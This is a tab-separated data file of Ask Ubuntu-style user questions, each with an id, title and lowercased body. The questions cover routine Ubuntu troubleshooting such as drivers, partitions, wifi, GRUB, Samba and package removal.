329805	help i broke terminal	i tried the below `` tip '' trying to learn different things i could do with terminal and it does not work . now i get an error message when i open terminal . how can i delete what i did ? thank you ! learn linux commands open the gnome terminal and run the following command : echo ‘man `ls /usr/bin | shuf -n 1`’ > > ~/.bashrc now , whenever you open a terminal , you will be greeted by a man page of a random command . it’s a nice way to learn about new commands .
329814	changing current directory to shared filesytem using linux terminal	i have a shared filesystem ( e : in my installation of windows 7 ) in which i keep my programming codes . i want to shift from windows to ubuntu for programming mainly because i like the linux terminal compared to alternative in windows . i asked this question after which i came to know that my shared filesystem is /dev/sda5 . i tried to use terminal to cd to this directory but i was n't able to do so . i have the shared filesystem loaded and i was in /dev when i tried to change to sda5 . the error was bash : cd : sda5 : not a directory how can i do that ?
329817	installation of ubuntu	computer specifications acer dual core 2gn 2gb ram with all inbuilt basic hardware . the whole hard disk is installed with win7 . i have logical partitions done after installing win7 using win7 's disk fragmentation facility . when i tried to boot ubuntu cd with has windows installer , i wont get the option of `` install ubuntu alongside windows '' i tried for complete installation , but the problem occurred is it is asking to format the whole disc . it is not showing the logical partitions .
329820	i want to format the hard drive and create partitions myself	i have fubuntu installed on a laptop and want to replace it with the newest ubuntu . i want to be able to create my own partitions during the install . however , there are partitions of the old fubuntu that it wo n't allow me to delete . is there a simple way to just delete all linux partitions on a drive so that it looks like a brand new hard disk ? i tried gparted on the live disk but that wo n't allow me to delete the lvm2 partition .
329824	how to watch an avi file	i get following error message when i try to play `` file_name.avi '' file using default video player or vlc : required plugin could not be found videos requires to install plugins to play media files of the following type : application/x-rar decoder how to install those plugins ? os : ubuntu 13.04
329828	ca n't see grub menu at all ! shift does n't work !	i changed my grub timeout to 0 . and now i ca n't access ubuntu at all ! any help ? i have no access to windows 7 . currently i am using a usb version of ubuntu . shift does n't work either i tried every single way possible ! and i 've read other answers , when they say do these commands , i do all but when i get to sudo update-grub i get an error message that it ca n't find the drive , or something like that ! please help ! not sure which grub . but the newest ubuntu .
329834	touchpad has stopped working !	i was in the middle of watching a video and my touchpad suddenly stopped working . i plugged a wireless mouse up and it works fine , and clicking on the touchpad works as well . i just ca n't move my mouse . i have a dell inspiron laptop running ubuntu 12.10 . i have done an update recently , but i do n't know if that would cause the problem since it stopped working in the middle of a session . i tried some things i found on here to possibly fix the problem , and now the touchpad does n't show up in my system setting anymore ... .
329835	ca n't use nvidia driver	i have a nvidia gtx 765m video card in my notebook running ubuntu 12.04.2 and ca n't figure out why it does n't use nvidia driver . i 've installed nvidia-current and nvidia-settings from this repository : ppa : ubuntu-x-swat/x-updates however when i run nvidia-settings this message is shown : you do not appear to be using the nvidia x driver . please edit your x configuration file ( just run `nvidia-xconfig` as root ) , and restart the x server . before run nvidia-xconfig i 've looked the /etc/x11/xorg.conf and it is completely empty . after running nvidia-xconfig the scree has as maximum resolution 640x480 , and the same message appears when i run nvidia-settings . added when i run lspci | grep vga just intel card is found : 00:02.0 vga compatible controller : intel corporation haswell integrated graphics controller ( rev 06 ) nvidia card is returned when i run lspci | grep 3d : 01:00.0 3d controller : nvidia corporation device 11e2 ( rev a1 ) what can i do to make this video card run using nvidia driver ?
329845	poor perfomance using 12.04	i installed ubuntu 12.04 with all the updates needed from additional hardware and system in dual boot with windows 7 to raise a little the performance of my pc . after installation , ubuntu was slower than windows 7 ( for example it takes like 5-10 seconds to open the terminal or opening the dash home after pressing it ) . i have a amd sempron with 2.0 ghz , 1.0 gb of ram and an internal graphics card nvidia nforce 630a . it is normal to be like this with the poor configuration or is there any conflict with the amd processor or graphics card ? how can i fix this ? here is the response for glxinfo | grep : direct rendering : yes opengl renderer string : geforce 7050 pv / nforce 630a/integrated/sse2/3dnow ! gl_nv_vertex_program3 , gl_nvx_conditional_render , gl_oes_depth_texture , gl_oes_element_index_uint , gl_oes_fbo_render_mipmap , and this for lspci | grep vga : 00:12.0 vga compatible controller : nvidia corporation c68 [ geforce 7050 pv / nforce 630a ] ( rev a2 )
329847	install nvidia geforce 610m in ubuntu 12.04lts on asus k55vd	i bought an asus k55 vd with inte i3 , but can not install nvidia geforce 610m in ubuntu 12.04 , please guide me with step by step installation if u could please . thank you
329850	installing unity on a 13.04 mini install without other packages	i 'm installing using this tutorial . it 's the mini version of ubuntu designed to be built as you go along , and it does n't come with a gui . i have tried to install unity , but it comes with many other packages i do n't want , such as thunderbolt and libre office . is there a way to just install unity ?
329852	recording a video podcast at a certain time / using vlc or another program like a dvr / pvr	i have several video podcast i would like to record and watch them when i get home . is there a program that will allow me to record podcast at a certain time in vlc or some other video program . i 'm trying to setup some type of dvr video podcasting system instead of waiting a day to down load the edited version of the podcast . thanks ps i have ubuntu 13.04 linux 64bit
329854	shrinking down ext4 partition not working , oracle vm ( w8 host / ubuntu 13.04 guest )	i 've been trying to follow a myriad of directions all to no avail . i have a 49.4gb drive that is only using 12.1gb of space . i would like to reduce this drive to 20gb in order for it to be used on a more economical vps hosting solution ( rates vary based on hd space and ram needed ) here is one set of instructions i followed that did not work . however the output seemed to work c : \program files\oracle\virtualbox > vboxmanage modifyhd `` d : \vmbox\eveservers.info alpha live v.3\eveservers.info alpha live v.1-disk1.vdi '' -compact 0 % ... 10 % ... 20 % ... 30 % ... 40 % ... 50 % ... 60 % ... 70 % ... 80 % ... 90 % ... 100 % any advice would be appreciated !
329860	ubuntu 12.04 and firefox 23 - how to turn off javascript ?	my browser updated yesterday and today i 've noticed that the option to turn off javascript is no longer there . did they relocate it somewhere ? help .
329861	ubuntu 12.10 updates fail	this is what i get . should i uninstall/reinstall ubuntu ? is there a simple fix ? i 'm a computer novice . failed to fetch http : //dl.google.com/linux/chrome/deb/pool/main/g/google-chrome-stable/google-chrome-stable_27.0.1453.110-r202711_i386.deb 404 not found [ ip : 2607 : f8b0:4003 : c02 : :5d 80 ] failed to fetch http : //us.archive.ubuntu.com/ubuntu/pool/main/m/mysql-5.5/mysql-common_5.5.31-0ubuntu0.12.04.2_all.deb 404 not found [ ip : 2001:67c:1562 : :14 80 ]
329863	unable to change resolution back to normal	after fixing the `` system runs in low graphic mode '' -error , the resolution of my screen changed to 640x480 . obviously , this is not my native resolution . i can not set it to the native resolution ( 1366 x 768 ) for some reason , since there is no other resolution shown in the monitor settings . arandr also does not show 1366x768 as a possible resolution . my laptop is a samsung r519 with standard resolution 1366x768 , with an intel graphic card . does anyone have an idea how to solve my problem ? i hope i explained it clear enough ( if there is some missing info , please let me know )
329864	how should i fix libraries that ca n't be found because of multiarch naming ?	i 've run into this problem a few times now . i have some program that is looking for a library and ca n't find it , even though it is in /usr/lib/x86_64-linux-gnu . maybe this a flaw in the way the dependent program was written . i do n't know much about this , but i would expect the dependent program to specify the name of the library , and let the system search a list of paths . can anyone explain briefly how ubuntu expects a properly behaved program to look for dynamic libraries ? as a concrete example , the latest case involves the libpcsclite.so library . the oracle documentation suggests that java ( the dependent program ) will look in /usr/lib64 and /usr/local/lib64 on my system—neither of which exist . i 've had similar problems in the past with non-java dependents . part of my question is , why would a program list search locations like this ? is there a search mechanism provided by linux that should be used instead ? is this a problem with java , to be corrected by using its sun.security.smartcardio.library system property , or is pcsclite failing to support the multi-architecture naming conventions correctly ? if the latter , should i be creating symlinks manually , or is this something a tool like ldconfig should fix ?
329865	how to debug keybindings ?	this is a question about how to debug a failing key-binding . because i love workspaces and vim bindings , i 've created a 3 x 3 square of workspaces and bound the following keyboard shortcuts to move between them : switch to workspace left ctrl+alt+h switch to workspace right ctrl+alt+l switch to workspace down ctrl+alt+j switch to workspace up ctrl+alt+k they work nicely ; all but ctrl+alt+h . if i start switching between workspaces with one of the other bindings , and then go left by pressing h without depressing ctrl+alt ... then it works . if i use shift+ctrl+alt+h to move a window to the left , that works too . but just pressing ctrl+alt+h by itself is useless : it does n't switch workspace left ! initially i thought this seemed to be because clipit was eating the event in order to show me my clip-board history . i 've changed that binding to ctrl+alt+o , though , and now there is just no response . the real problem , though , is that i do n't know how to debug keyboard bindings . they seems like a real mess ! the bindings are all in different places ; every piece of software running on my computer might have its hand in the soup . i 'm not even sure where to start !
329871	wireless wo n't connect !	i recently installed ubuntu onto my dell inspiron 1545 laptop . i can connect to the internet via ethernet , but wireless wo n't work . the prompt to put in the wifi password pops up , but when i put in the password , it simply says connecting and the prompt for the password comes back up ! the prompt will come back up every two or three minutes , but the same thing happens . i 've tried to install drivers using windows wireless drivers , but i ca n't seem to figure it out . my wireless card is an atheros ar928x . this is my first time using ubuntu . here is the output of the commands i 've been asked to run : 1- output of lspci -nnk | grep -ia2 net $ lspci -nnk | grep -ia2 net 09:00.0 ethernet controller [ 0200 ] : marvell technology group ltd. 88e8040 pci-e fast ethernet controller [ 11ab:4354 ] ( rev 13 ) subsystem : dell device [ 1028:02aa ] kernel driver in use : sky2 -- 0c:00.0 network controller [ 0280 ] : atheros communications inc. ar928x wireless network adapter ( pci-express ) [ 168c:002a ] ( rev 01 ) subsystem : atheros communications inc. device [ 168c:0200 ] kernel driver in use : ath9k 2- output of lsusb $ lsusb bus 001 device 003 : id 0c45:63ee microdia bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 008 device 001 : id 1d6b:0001 linux foundation 1.1 root hub 3- output of nm-tool , sudo iwlist scan and iwconfig $ nm-tool networkmanager tool state : connected ( global ) - device : eth0 [ wired connection 1 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : sky2 state : connected default : yes hw address : 00:25:64:44:02:7d capabilities : carrier detect : yes speed : 100 mb/s wired properties carrier : on ipv4 settings : address : 192.168.1.90 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.1.254 dns : 192.168.1.254 dns : 75.153.176.9 - device : wlan0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : ath9k state : disconnected default : no hw address : 00:22:5f : c2:08:1f capabilities : wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points beau : infra , 00:26 : b8 : ed : e6 : cc , freq 2422 mhz , rate 54 mb/s , strength 95 wpa verjee : infra , f0 : d1 : a9:14:03:7a , freq 2452 mhz , rate 54 mb/s , strength 32 wpa2 $ sudo iwlist scan lo interface does n't support scanning . eth0 interface does n't support scanning . wlan0 scan completed : cell 01 - address : 00:26 : b8 : ed : e6 : cc channel:3 frequency:2.422 ghz ( channel 3 ) quality=64/70 signal level=-46 dbm encryption key : on essid : '' beau '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 18 mb/s 24 mb/s ; 36 mb/s ; 54 mb/s bit rates:6 mb/s ; 9 mb/s ; 12 mb/s ; 48 mb/s mode : master extra : tsf=0000024523a5e000 extra : last beacon : 36ms ago ie : unknown : 000462656175 ie : unknown : 010882848b962430486c ie : unknown : 030103 ie : unknown : 2a0100 ie : unknown : 2f0100 ie : unknown : 32040c121860 ie : unknown : 2d1a6c181bffff000000000000000000000000000000000000000000 ie : unknown : 3d1603001300000000000000000000000000000000000000 ie : unknown : dd090010180202f0050000 ie : wpa version 1 group cipher : tkip pairwise ciphers ( 1 ) : tkip ie : unknown : dd180050f2020101800003a4000027a4000042435e0062322f00 ie : unknown : dd1e00904c336c181bffff000000000000000000000000000000000000000000 ie : unknown : dd1a00904c3403001300000000000000000000000000000000000000 cell 02 - address : f0 : d1 : a9:14:03:7a channel:9 frequency:2.452 ghz ( channel 9 ) quality=27/70 signal level=-83 dbm encryption key : on essid : '' verjee '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 6 mb/s 9 mb/s ; 12 mb/s ; 18 mb/s bit rates:24 mb/s ; 36 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=000000173491f180 extra : last beacon : 3636ms ago ie : unknown : 00067665726a6565 ie : unknown : 010882848b960c121824 ie : unknown : 030109 ie : unknown : 0706434120010b1e ie : unknown : 2a0100 ie : unknown : 32043048606c ie : ieee 802.11i/wpa2 version 1 group cipher : ccmp pairwise ciphers ( 1 ) : ccmp authentication suites ( 1 ) : psk ie : unknown : 2d1aad511bffff000000000000000000000000000000000000000000 ie : unknown : 33027e9d ie : unknown : 3d1609080400000000000000000000000000000000000000 ie : unknown : 46050200010000 ie : unknown : dd180050f2020101010003a4000027a4000042435e0062322f00 ie : unknown : dd0700039301730b20 ie : unknown : dd0e0017f20700010106f0d1a914037a $ iwconfig wlan0 ieee 802.11abgn essid : off/any mode : managed access point : not-associated tx-power=16 dbm retry long limit:7 rts thr : off fragment thr : off power management : off lo no wireless extensions . eth0 no wireless extensions . authentication suites ( 1 ) : psk 4- output of rfkill list all $ rfkill list all 0 : phy0 : wireless lan soft blocked : no hard blocked : no 5- output of lsmod $ lsmod module size used by bnep 17791 2 rfcomm 38104 0 bluetooth 189625 10 bnep , rfcomm parport_pc 32115 0 ppdev 12850 0 snd_hda_codec_idt 60238 1 arc4 12474 2 snd_hda_intel 32983 5 snd_hda_codec 116477 2 snd_hda_codec_idt , snd_hda_intel snd_hwdep 13277 1 snd_hda_codec joydev 17394 0 ath9k 122028 0 mac80211 475546 1 ath9k snd_pcm 81124 3 snd_hda_intel , snd_hda_codec snd_seq_midi 13133 0 snd_rawmidi 25426 1 snd_seq_midi snd_seq_midi_event 14476 1 snd_seq_midi ath9k_common 13782 1 ath9k ath9k_hw 384090 2 ath9k , ath9k_common i915 479235 4 uvcvideo 72249 0 snd_seq 51594 2 snd_seq_midi , snd_seq_midi_event snd_timer 28932 2 snd_pcm , snd_seq snd_seq_device 14138 3 snd_seq_midi , snd_rawmidi , snd_seq videobuf2_core 32212 1 uvcvideo ath 19436 3 ath9k , ath9k_common , ath9k_hw drm_kms_helper 47459 1 i915 cfg80211 181041 3 ath9k , mac80211 , ath drm 240443 5 i915 , drm_kms_helper psmouse 91381 0 videodev 100265 2 uvcvideo , videobuf2_core snd 62675 18 snd_hda_codec_idt , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device videobuf2_vmalloc 12757 1 uvcvideo videobuf2_memops 13213 1 videobuf2_vmalloc dell_wmi 12602 0 coretemp 13362 0 sparse_keymap 13659 1 dell_wmi gpio_ich 13160 0 wmi 18745 1 dell_wmi dell_laptop 17210 0 microcode 18396 0 dcdbas 14099 1 dell_laptop soundcore 14636 1 snd snd_page_alloc 14109 2 snd_hda_intel , snd_pcm serio_raw 13032 0 lpc_ich 16993 0 i2c_algo_bit 13317 1 i915 mac_hid 13078 0 video 19117 1 i915 lp 17456 0 parport 40931 3 parport_pc , ppdev , lp ums_realtek 17929 0 usb_storage 39720 1 ums_realtek ahci 25621 2 libahci 26166 1 ahci sky2 53629 0 6- modprobing echo `` options ath9k nohwcrypt=1 '' | sudo tee /etc/modprobe.d/ath9k.conf options ath9k nohwcrypt=1 sudo modprobe -rfv ath9k rmmod /lib/modules/3.5.0-37-generic/kernel/drivers/net/wireless/ath/ath9k/ath9k.ko rmmod /lib/modules/3.5.0-37-generic/kernel/net/mac80211/mac80211.ko rmmod /lib/modules/3.5.0-37-generic/kernel/drivers/net/wireless/ath/ath9k/ath9k_common.ko rmmod /lib/modules/3.5.0-37-generic/kernel/drivers/net/wireless/ath/ath9k/ath9k_hw.ko rmmod /lib/modules/3.5.0-37-generic/kernel/drivers/net/wireless/ath/ath.ko rmmod /lib/modules/3.5.0-37-generic/kernel/net/wireless/cfg80211.ko sudo modprobe -v ath9k insmod /lib/modules/3.5.0-37-generic/kernel/net/wireless/cfg80211.ko insmod /lib/modules/3.5.0-37-generic/kernel/drivers/net/wireless/ath/ath.ko insmod /lib/modules/3.5.0-37-generic/kernel/drivers/net/wireless/ath/ath9k/ath9k_hw.ko insmod /lib/modules/3.5.0-37-generic/kernel/drivers/net/wireless/ath/ath9k/ath9k_common.ko insmod /lib/modules/3.5.0-37-generic/kernel/net/mac80211/mac80211.ko insmod /lib/modules/3.5.0-37-generic/kernel/drivers/net/wireless/ath/ath9k/ath9k.ko nohwcrypt=1 7- output of dmesg | egrep 'ath|firm|wlan|network|wpa' http : //pastebin.com/yslm71yn any and all help is welcome !
329872	what will happen when there are no more letters in the alphabet for ubuntu codenames ?	i know how codenames are chosen . i know where i can submit codenames . what i do n't know is what will happen in 4 years from now ( if my maths are n't that bad , 2017 ) when there are no more letters in the alphabet for the codenames . will it goes backwards ( ie . xyzyxw ) ? will start over from a ? will use combinations ( ab , ac , ad ... ) , like amourous bosnians ? did anyone get a wind of this ?
329873	mysql error 1045 ( 280000 ) access denied for user 'debian-sys-maint ' @ ' localhost using password 'yes '	i edited deian.cnf to change the password of mysql ( ubuntu server ) sudo vi /etc/mysql/debian.cnf i change user=debian-sys-maint password=* to user=debian-sys-maint password=mypassword then i tried to enter console of mysql mysql -udebian-sys-maint -p and inputed password 'mypassword' it reported mysql error 1045 ( 280000 ) access denied for user 'debian-sys-maint ' @ ' localhost using password 'yes' i tried to remove mysql and reinstall , the error is same . your comment welcome
329875	root partition size remains same after partition resize with gparted	i had resized my root partition from 30gb to 70gb using gparted . but ubuntu still shows that i have the same old disk size while gparted shows that i acually have 70gb and that the other 40gb is somehow used . how can i fix this ? output of 'df -h ' : filesystem size used avail use % mounted on /dev/sda5 30g 16g 13g 55 % / none 4.0k 0 4.0k 0 % /sys/fs/cgroup udev 1.9g 8.0k 1.9g 1 % /dev tmpfs 391m 884k 390m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 2.0g 284k 2.0g 1 % /run/shm none 100m 48k 100m 1 % /run/user /dev/sda6 341g 115g 227g 34 % /media/data /dev/sdb1 932g 459g 474g 50 % /media/sidharth/passport output of mount : /dev/sda5 on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/cgroup type tmpfs ( rw ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) none on /run/user type tmpfs ( rw , noexec , nosuid , nodev , size=104857600 , mode=0755 ) /dev/sda6 on /media/data type fuseblk ( rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 ) binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc ( rw , noexec , nosuid , nodev ) gvfsd-fuse on /run/user/sidharth/gvfs type fuse.gvfsd-fuse ( rw , nosuid , nodev , user=sidharth ) /dev/sdb1 on /media/sidharth/passport type fuseblk ( rw , nosuid , nodev , allow_other , blksize=4096 )
329878	ubuntu can see network work group but ca n't see ubuntu from windows	sorry to be a complete noob , just installed ubuntu and i 'm trying to get things up and running . goal : to connect several drives to my ubuntu , very old , laptop . this will act as a nas serving up music , video , and documents for my in home , windows workgroup . where i am now : ubuntu is running on my laptop . i 've installed updates and believe i 'm current ( but do n't know how to check/confirm ) . samba is installed on the ubuntu laptop . i followed the instructions from many on-line sites and best i can tell it seems to be running correctly . i can see all my windows machines from home - > browse network - > windows network - > workgroup . all three other computers that are on the workgroup appear and i 'm able to go in and see files and such . so far so good . but that is where i run into trouble . remember the point of this fun is to have the ubuntu box serving the stuff , however ... none of my windows machines can see the ubuntu laptop on the network . when i go in to my computer - > network i see my other two windows machines but not the ubuntu laptop . this is happening on both win 7 and win 8 . right now it is all hard wired , so wireless is not an issue . after multiple refreshes , trying all kinds of things , lost sleep the past few nights , and pulling out lots of hair , i 've broken down and decided to ask for help . ya it 's a first step . anyways , i 've looked all over and ca n't find anything that can help on-line . i must have messed something simple up , so simple that no one bothers to mention it in their walk through . at least i hope so . any help you could offer would be , well , helpful . edit # 1 : user68186 - i went through the link you provided . i added a new share through the samba gui : /home/steve/1-share i checked all the permissions ( of course the screens look a bit different ) but it loks like everything is correct . i get stuck here : step 3 . go to the windows on the desktop computer and open windows explorer , click on the triangle next to network on the left panel . from the drop-down list you should be able to select the name of the laptop computer running ubuntu . um , the laptop is just not listed there . edit # 2 : also , i can not see the laptop if i type the ip address into firefox . `` firefox ca n't establish a connection to the server at 192.168.1.xxx '' ( where xxx is the last 3 numbers of course ) edit # 3 : thanks dan , so i typed `` \192.168.1.xxx\home/steve/public '' into explorer ( this folder is shared in the samba server configuration ) and i get the message `` windows can not access \192.168.1.xxx\home/steve/public '' . just cause i do n't know the formats better i also tried `` \192.168.1.xxx\home\steve\public '' too but get the same message . also tried `` \192.168.1.109\steve-xxx '' and get the same message . it seems windows really ca n't see the laptop .
329879	how to see all directories from remote ?	i am on ubuntu 12.04 server , after i login as sudoer from remote , i try to see all directories with ls command nut nothing happens . i can switch to the home directory by using cd /home and i see all directories with the ls command there . what am i doing wrong ? where is my position after logging into the server ? the problem is , that i probably installed something in a wrong location and i ca n't find it . update : i can create a folder , but i ca n't see it ... i do create for instance mkdir /temp and i can access it . but i cant see it in the folder before .
329880	ubuntu 13.04 invert touch pad scroll direction	after being away from ubuntu for a while and being used to an inverted touchpad scrolling , i have recently jumped on ubuntu 13.04 bandwagon again . i have being having a hard time and am wondering if it is possible to invert ?
329882	ubuntu 13.04 on alienware m17x r5	i 've got an m17x-r5 with the intel 4800 cpu , nvidia 3d graphics and it came with 5g wifi and a killer ethernet card . this is to replace my ageing m17x r1 which until recently worked perfectly with all i threw at it from ubnutu 10.04 onwards . when i come to install ubuntu 13.04 on the new alienware , all appears well except it does n't detect an internet connection to download the updates whist it installs . i 've tried with a physical cable , via wifi and can only get it to detect a wireless connection if i plug in an old usb wifi adapter . after installing with the usb wifi plugged in , and all patches applied , it still refuses point blank to detect a network unless i use the usb adapter . i 've tried installing jockey and looking for additional drivers/hardware but none are found . i 'm very comfortable with unix/linux/aix etc , but have to admit that when it comes to drivers and linux , i 'm a novice . any help would be appreciated . edit : in answer to pj singh 's very pertinent question in the comment section , this is a snip from the lspci command taken at boot from a usb boot disk ( try ubuntu option ) without any external wifi dongles installed : 08:00.0 ethernet controller : qualcomm atheros killer e2200 gigiabit ethernet controller ( rev 10 ) 0a:00.0 network controller : broadcom corporation device 43b1 ( rev 03 ) i should also note that when i said to begin with that it could n't find any wifi networks to install the updates over , it actually could n't find any wireless adapters . edit : added output from process here ( nicer formatting ) root @ m17xr5-lnx : /usr/src/b43b1-6.30.223.95 # lsmod | grep wl wl 4117081 0 lib80211 14352 2 wl , lib80211_crypt_tkip cfg80211 510937 3 wl , mac80211 , rt2x00lib root @ m17xr5-lnx : /usr/src/b43b1-6.30.223.95 # cat /etc/modules wl root @ m17xr5-lnx : /usr/src/b43b1-6.30.223.95 # edit : resolved this today ( september 29th 2013 ) by installing the latest broadcomm drivers that are available with 13.10 . no compilation required , just installed using the package manager and loh-and-behold , the wireless adapter came to life - did n't even need a reboot .
329888	qt5 not working	i 'm trying to get qt5 working on ubuntu 12.04 . i downloaded the 32-bit installer from http : //qt-project.org/downloads and basically just let it install everything in my home folder . i had to add ~/qt/5.1.0/gcc/bin to my path for qmake to work , but now when i try to make a hello qt example ( using qt4 book ) , when running make , it can not find the qapplication or qlabel header . when i replace them with qtwidgets/qapplication , it finds the header , but i get all undefined references when linking . this is the command make executes : g++ -c -pipe -o2 -wall -w -d_reentrant -fpie -dqt_no_debug -dqt_gui_lib -dqt_core_lib -i../../../../qt/5.1.0/gcc/mkspecs/linux-g++ -i . -i . -i../../../../qt/5.1.0/gcc/include -i../../../../qt/5.1.0/gcc/include/qtgui -i../../../../qt/5.1.0/gcc/include/qtcore -i . -o hello.o hello.c any ideas on what to try ?
329890	how can i run repast simphony 2.0 on ubuntu 12.04 ?	i have tried installing repast simphony 2.0 using a downloaded version of eclipse ( as per the linux installation instructions - although which is the `` classic edition '' ? ) and following the same instructions with the version of eclipse packaged in the 12.04 repos . neither method has succeeded . how can i get repast running ? ( i do not need it to install in an automatic/packaged way . for example , could i use the version of eclipse created by the windows installer and replace eclipse.exe with the linux eclipse jar ? )
329891	tp link tl-wn7200nd signal strength	i have external wireless adapter tp link tl-wn7200nd i 'm currently using it on windows its giving me 4/5 signal bars when i used same adapter in ubuntu 13.04 it gives 2/4 bars . i 'm using live usb for ubuntu and and i 'm also not sure if i have to install any drivers cause in network options its showing 2 lists of networks 1 with low signals 2nd with high ( more bars ) .
329893	removed device from ubuntu one setup	by accident i removed from my computer - device from ubuntu one setup ; there was my old computer still showing so i wanted to get it out and by accident to wrong one was removed . i am logged in , all is working , but as far as settings , i am trying to log back inn , but i get error message . i am verrrry green as far as ubuntu or linux ( ex window user 1 month ) so be gentle with me . thank you john ubuntu 13.04
329897	screen gets minimized by letter d . ?	i setup remote desktop connection on my intranet between two computers one running ubuntu 13.04 and the other windows 8 pro . i set it up so i can access and use ubuntu with rdc from win 8 . all is perfect except every time i press `` d `` letter d small everything gets minimized on the remote screen . the d capital is no problem . what did i do wrong and how can i fix it ? thank you john
329903	anyway to use audio over dvi	hi i 've only just installed ubuntu for xmbc works ok using speakers . but i 've had a play and ca n't get audio to my tv . dvi to hdmi . not sure if there is anything i can do .
329905	how to upgrade from 9.04 to 13.04 ?	i 've seen these upgrade notes which say that the only upgrade path from 9.04 is to 9.10 . and the same notes say that the only upgrade path from 9.10 is 10.04 , and so on . it seems that i would need to perform at least 5 upgrades in order to turn a 9.04 installation into a 13.04 -- i hope i misunderstood something ! given that i have a 9.04 installation that i want to move to the newest version , what 's my best course of action ? there is n't a lot of stuff on the machine right now , and data is backed up . what happens to the current installation if i simply pop in a 13.04 cd and just install that ? finally , if it really is better to wipe the machine and start from scratch , how can i best keep track of ( or even preserve ! ) the installed apps , settings , and so on ? everything except user data itself which is backed up .
329908	upgrading from ubuntu 32 bit to 64 bit with software raid	i 'm currently running ubuntu 13.04 32 bit . i 'd like to move to 64 bit and everything i 've read has stated that i should probably completely reinstall to do so . i have my os on a 1gb hard drive and then i have a 10tb software raid mounted to a separate folder . my question is , if i completely reinstall ubuntu , will i lose my software raid , or will the new installation recognize the software raid once i remount it , with all of my data intact ?
329915	the ubuntu installation does not create swap partition	the ubuntu installation does not create swap partition . this issue happen with both 12.04.2 and 13.04 . i tested it with two diferents pc and with a virtual machine in virtual box into ubuntu . i tried both automatic and manual installation options during installation . the partition is created but with errors and the system can not mount the partition swap at startup . i solved the problem by booting the system from pendrive , then start gparted and format the partition again . this worked for only a few days .
329921	minimalist alternative to rhythmbox	is there a good music player for 12.04 that is simple , text-based , and lightweight ? i would like something that does n't use up much cpu , and looks clean , with little gui . i 've seen a simple , terminal-like one for arch , but i was wondering if such thing exists for ubuntu .
329922	native support of wifi usb/pcie	i 'm building a desktop right now and need to buy a wifi card or wifi usb stick . can you tell what kind of wifi cards/sticks work out of the box in ubuntu 13.04 ? should i buy a usb wifi or pci-e wifi . i know a lot of people have troubles with wifi in linux systems . thanks in advance
329925	touchpad detected as generic mouse- any solutions yet ?	i have a dell inspiron and am running on ubuntu 12.10 . my side scrolling has stopped working recently , and the touchpad does not show up anywhere in my settings . when i tried to check on my side scrolling i got this : synclient vertedgescroll=1 could n't find synaptics properties . no synaptics driver loaded ? and when i do xinput-list the touchpad appears to be detected as a generic mouse . i 've seen this problem on other forums and there do n't seem to be any solutions there . is there any solution for this ? i 'm kind of new to ubuntu so if there 's anything 'complicated ' it would be nice to have a step by step tutorial ... thanks in advance
329926	ndiswrapper-gtk shows hardware present yet no wifi !	ok ladies and gents . im pretty new at this . i have gone through a quite lengthy set-up process of acquiring a working copy of ndiswrapper . currently i am running ubuntu 12.04 amd-64-lts . my wireless hardware is netgear wna3100 . i have gone and read countless times that people have issues with ndiswrapper having missing modules . i worked around it by installing ndiswrapper 1.58 as suggested on another help site . the current issue at hand is i can load drivers found on the web that are `` meant '' for my card . these drivers work albeit not well as my bandwidth is capped at 5mbps . this shows me a real-time speedtest.net test of around 4-5mbps quite slow considering when i plug in another wireless usb netgear wna1100 i see around 30mbps down . yes i know you will say `` you have a working usb card . '' indeed i do , however i would prefer the higher bandwidth usb card as it is twice the connect speed through windows . back to the issue at hand . i have deleted the necessary .inf driver files from ndis-gtk and also removed them from ndiswrapper successfully . the issue is that when i pull the real driver from my windows installation directory bcmwlhigh6.inf i get the whole `` hardware not present ndis-gtk . i then sudo modprobe ndiswrapper in console . plug the usb card in just like the process for the bogus driver . no blue light : -/ at that point i pulled the usb from the cradle . sudo reboot . let my system power up and sudo modprobe ndiswrapper , plugged in the usb and still no blue light . what should i do ? ndis-gtk shows it blatantly on the gui that my card is indeed plugged in . this process works for the bogus driver yet wont work for the real one from a windows install , i find this highly irregular . all of my limited experience with ndiswrapper have gone fairly smoothly with exception of the 1.57 glitch that most of us on 12.04 had . i cant run this card at 5mbps when its capable of over 100 wirelessly . i do a fair amount of gaming so please help . for the record i have no error logs as the install of 1.58 was seamless . excuse me for my lengthy explanation , it has just been one of those days . nic
329927	how do i uninstall skype ?	i am new to ubuntu 12.04 , and recently installed skype . due to some issues with it , i want to uninstall it , but i do n't know how . it does n't appear in the ubuntu software center , and i 'm not sure where to look for a way to uninstall it . sorry if this has already been asked/solved , but i have been searching for a while and have n't found anything that specifically relates to my problem .
